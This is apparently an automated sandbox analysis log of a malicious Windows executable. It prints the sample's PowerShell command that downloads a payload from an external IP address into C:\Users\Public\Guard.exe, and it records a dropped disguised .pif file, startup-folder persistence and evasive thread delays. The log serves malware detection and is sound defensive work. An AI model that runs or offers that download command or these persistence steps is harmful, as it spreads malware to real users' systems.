Source: EO3RT0fEfb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: EO3RT0fEfb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: EO3RT0fEfb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: EO3RT0fEfb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: EO3RT0fEfb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: EO3RT0fEfb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: EO3RT0fEfb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: EO3RT0fEfb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: EO3RT0fEfb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: EO3RT0fEfb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: EO3RT0fEfb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe""Jump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D7634 LoadLibraryA,GetProcAddress,0_2_00007FF75F1D7634
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1778FD push rdi; ret 0_2_00007FF75F177904
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F177399 push rdi; ret 0_2_00007FF75F1773A2
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2E93F push edi; ret 5_2_00B2E941
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2EA58 push esi; ret 5_2_00B2EA5A
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B68A4A push FFFFFF8Bh; iretd 5_2_00B68A4C
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B1CBF1 push eax; retf 5_2_00B1CBF8
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B28B75 push ecx; ret 5_2_00B28B88
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2EC33 push esi; ret 5_2_00B2EC35
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2ED1C push edi; ret 5_2_00B2ED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027E93F push edi; ret 12_2_0027E941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B8A4A push FFFFFF8Bh; iretd 12_2_002B8A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027EA58 push esi; ret 12_2_0027EA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_00278B75 push ecx; ret 12_2_00278B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027EC33 push esi; ret 12_2_0027EC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027ED1C push edi; ret 12_2_0027ED1E

Persistence and Installation Behavior

barindex
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F164514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00007FF75F164514
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00B859B3
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B15EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00B15EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002D59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_002D59B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_00265EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00265EDA
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B233B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00B233B7
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5074Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4764Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4232Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5522Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeAPI coverage: 3.7 %
Source: C:\Users\Public\Guard.exeAPI coverage: 6.1 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -1844674407370954s >= -30000sJump to behavior
